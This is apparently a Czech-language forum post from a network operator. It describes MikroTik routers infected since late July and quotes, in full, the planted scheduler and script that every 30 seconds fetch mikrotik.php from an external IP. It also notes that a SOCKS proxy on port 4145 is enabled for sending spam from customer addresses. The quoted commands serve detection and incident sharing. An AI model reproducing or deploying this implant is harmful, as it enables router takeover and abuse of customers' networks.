nezaznamenali jste od 30.7 zvyseny pocet odeslanych emailu od zakazniku?aktualne pozoruji ze vsichni s Mk maji
/system scheduleradd interval=30s name=schedule3_ on-event=script3_ policy=ftp,reboot,read,write,policy,test,password,sensitive start-time=startup/system scriptadd name=script3_ owner=admin policy=ftp,reboot,read,write,policy,test,password,sensitive source="/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http"
a ve files: mikrotik.php
ip adresa pouzivaji 95.154.216.164-165-166
bezi to i na MK s 6.40.6, problemy jsem zatim nezaznamenal na MK s 6.40.8, ale je to zatim prvni dojem
tenhle typ 'infekce' jeste povoluje SOCKS server, ktery nastavuje tusim na port 4145. Diky SOCKS muze pak delat cokoliv - tedy i rozesilat maily z IP zakazniku. Zda se, ze je to v posledni dobe nejbeznejsi typ nakazi. Vyznam toho mikrotik.php filu je zrejme jen indikace, ze uz je napadeny